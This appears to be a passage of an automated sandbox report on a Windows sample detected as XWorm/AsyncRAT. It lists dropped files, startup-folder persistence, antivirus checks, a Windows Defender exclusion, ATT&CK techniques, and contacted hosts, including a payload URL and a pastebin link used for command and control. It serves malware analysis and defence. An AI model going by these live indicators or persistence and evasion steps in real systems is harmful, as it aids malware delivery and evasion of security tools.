                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\Public\Runtime BrokerQueries volume information: C:\Users\Public\Runtime Broker VolumeInformation
                        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                        Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeCode function: 0_2_00007FF6ACE862B4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6ACE862B4
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: Process Memory Space: coonfart.exe PID: 4320, type: MEMORYSTR
                        Source: coonfart.exe, 00000002.00000002.2926093012.000000001BC47000.00000004.00000020.00020000.00000000.sdmp, coonfart.exe, 00000002.00000002.2926093012.000000001BBE1000.00000004.00000020.00020000.00000000.sdmp, coonfart.exe, 00000002.00000002.2926093012.000000001BCBC000.00000004.00000020.00020000.00000000.sdmp, coonfart.exe, 00000002.00000002.2931033359.000000001C4C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected XWorm
                        Source: Yara matchFile source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.coonfart.exe.12d61a78.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.coonfart.exe.a00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2915078588.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2922028493.0000000012D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2910321731.000001EE0BC0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1740708063.000001EE0BC02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 80BvHOM51j.exe PID: 2832, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: coonfart.exe PID: 4320, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1], type: DROPPED
                        Source: Yara matchFile source: C:\Users\Public\Runtime Broker, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Yara detected XWorm
                        Source: Yara matchFile source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.coonfart.exe.12d61a78.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.coonfart.exe.a00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.1740708063.000001EE0BBE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2915078588.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.1739984751.0000000000A02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2922028493.0000000012D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2910321731.000001EE0BC0A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1740708063.000001EE0BC02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 80BvHOM51j.exe PID: 2832, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: coonfart.exe PID: 4320, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1], type: DROPPED
                        Source: Yara matchFile source: C:\Users\Public\Runtime Broker, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information11
                        Scripting                        		Valid Accounts12
                        Windows Management Instrumentation                        		11
                        Scripting                        		1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		11
                        Input Capture                        		1
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Web Service                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Scheduled Task/Job                        		1
                        DLL Side-Loading                        		11
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory2
                        File and Directory Discovery                        		Remote Desktop Protocol11
                        Input Capture                        		2
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        PowerShell                        		2
                        Scheduled Task/Job                        		2
                        Scheduled Task/Job                        		11
                        Obfuscated Files or Information                        		Security Account Manager34
                        System Information Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive11
                        Encrypted Channel                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCron121
                        Registry Run Keys / Startup Folder                        		121
                        Registry Run Keys / Startup Folder                        		2
                        Software Packing                        		NTDS1
                        Query Registry                        		Distributed Component Object ModelInput Capture1
                        Non-Standard Port                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets561
                        Security Software Discovery                        		SSHKeylogging2
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts131
                        Masquerading                        		Cached Domain Credentials1
                        Process Discovery                        		VNCGUI Input Capture113
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items161
                        Virtualization/Sandbox Evasion                        		DCSync161
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                        Process Injection                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        System Network Configuration Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532625 Sample: 80BvHOM51j.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 60 pastebin.com 2->60 62 ip-api.com 2->62 64 2 other IPs or domains 2->64 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 Antivirus detection for dropped file 2->82 86 24 other signatures 2->86 9 80BvHOM51j.exe 18 2->9         started        14 cmd.exe 2->14         started        16 svchost.exe 2->16         started        18 4 other processes 2->18 signatures3 84 Connects to a pastebin service (likely for C&C) 60->84 process4 dnsIp5 72 homebots.io 143.178.83.216, 443, 49730, 49731 TMOBILE-THUISNL Netherlands 9->72 56 C:\Users\user\AppData\...\coonfart.exe, PE32 9->56 dropped 58 45b52685-cc32-47e5-abd7-306bfc875622[1], PE32 9->58 dropped 94 Drops script or batch files to the startup folder 9->94 96 Drops PE files to the startup folder 9->96 98 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->98 20 coonfart.exe 15 6 9->20         started        25 cmd.exe 1 9->25         started        27 conhost.exe 9->27         started        29 cmd.exe 1 9->29         started        31 conhost.exe 14->31         started        74 127.0.0.1 unknown unknown 16->74 file6 signatures7 process8 dnsIp9 66 ip-api.com 208.95.112.1, 49732, 80 TUT-ASUS United States 20->66 68 pastebin.com 104.20.4.235, 443, 49831 CLOUDFLARENETUS United States 20->68 70 193.161.193.99, 46070, 49869, 49901 BITREE-ASRU Russian Federation 20->70 54 C:\Users\Public\Runtime Broker, PE32 20->54 dropped 88 Protects its processes via BreakOnTermination flag 20->88 90 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->90 92 Adds a directory exclusion to Windows Defender 20->92 33 powershell.exe 23 20->33         started        36 powershell.exe 22 20->36         started        38 powershell.exe 20->38         started        42 2 other processes 20->42 40 conhost.exe 25->40         started        file10 signatures11 process12 signatures13 76 Loading BitLocker PowerShell Module 33->76 44 conhost.exe 33->44         started        46 conhost.exe 36->46         started        48 conhost.exe 38->48         started        50 conhost.exe 42->50         started        52 conhost.exe 42->52         started        process14

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        80BvHOM51j.exe5%ReversingLabs
                        80BvHOM51j.exe10%VirustotalBrowse

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\Public\Runtime Broker100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe100%AviraTR/Spy.Gen
                        C:\Users\Public\Runtime Broker100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe100%Joe Sandbox ML
                        C:\Users\Public\Runtime Broker81%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        C:\Users\Public\Runtime Broker66%VirustotalBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]81%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]66%VirustotalBrowse
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe81%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exe66%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        homebots.io2%VirustotalBrowse
                        ip-api.com0%VirustotalBrowse
                        pastebin.com0%VirustotalBrowse
                        bin.homebots.io4%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
                        https://g.live.com/odclientsettings/Prod.C:0%URL Reputationsafe
                        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        https://aka.ms/pscore680%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                        https://discord.gift/cls1%VirustotalBrowse
                        https://discord.gift/1%VirustotalBrowse
                        https://bin.homebots.io/4%VirustotalBrowse
                        http://www.microsoft.co1%VirustotalBrowse
                        https://pastebin.com/raw/LsuynkUz1%VirustotalBrowse
                        https://bin.homebots.io/f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc8756224%VirustotalBrowse
                        https://github.com/Pester/Pester1%VirustotalBrowse
                        http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                        https://g.live.com/odclientsettings/ProdV20%VirustotalBrowse
                        https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c960%VirustotalBrowse
                        https://bin.homebots.io/f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622#4%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        homebots.io
                        		143.178.83.216
                        		truefalseunknown
                        ip-api.com
                        		208.95.112.1
                        		truetrueunknown
                        pastebin.com
                        		104.20.4.235
                        		truetrueunknown
                        bin.homebots.io
                        		unknown
                        		unknowntrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://bin.homebots.io/f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622falseunknown
                        https://pastebin.com/raw/LsuynkUztrueunknown
                        http://ip-api.com/line/?fields=hostingfalse
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1844678858.0000021358544000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945912327.00000240CC0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2099020934.000001823F812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2320434265.000001BC376F0000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.2167775470.000001BC278A9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1821832936.00000213486FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1891461405.00000240BC27A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002606468.000001822F9C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2167775470.000001BC278A9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://discord.gift/80BvHOM51j.exefalseunknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.2167775470.000001BC278A9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://discord.gift/cls80BvHOM51j.exefalseunknown
                        https://bin.homebots.io/80BvHOM51j.exe, 00000000.00000002.2909568930.000001EE09EAD000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://www.microsoft.copowershell.exe, 0000000C.00000002.1965699235.00000240D4733000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://contoso.com/Licensepowershell.exe, 00000013.00000002.2320434265.000001BC376F0000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000013.00000002.2320434265.000001BC376F0000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.ver)svchost.exe, 0000001A.00000002.2913557497.000001A4D6000000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://g.live.com/odclientsettings/ProdV2.C:edb.log.26.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://bin.homebots.io/f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622580BvHOM51j.exe, 00000000.00000002.2909568930.000001EE09E50000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.2167775470.000001BC278A9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://g.live.com/odclientsettings/Prod.C:edb.log.26.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://g.live.com/odclientsettings/ProdV2edb.log.26.drfalseunknown
                            http://www.microsoft.cVf6powershell.exe, 0000000C.00000002.1965699235.00000240D46E0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 0000001A.00000003.2517348187.000001A4D5EB2000.00000004.00000800.00020000.00000000.sdmp, edb.log.26.drfalseunknown
                              https://bin.homebots.io/f/0bd6fd77-6477-4491-a6a1-b69876184fc7/45b52685-cc32-47e5-abd7-306bfc875622#80BvHOM51j.exe, 00000000.00000002.2909568930.000001EE09EAD000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1821832936.00000213486FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1891461405.00000240BC27A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002606468.000001822F9C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2167775470.000001BC278A9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000013.00000002.2320434265.000001BC376F0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
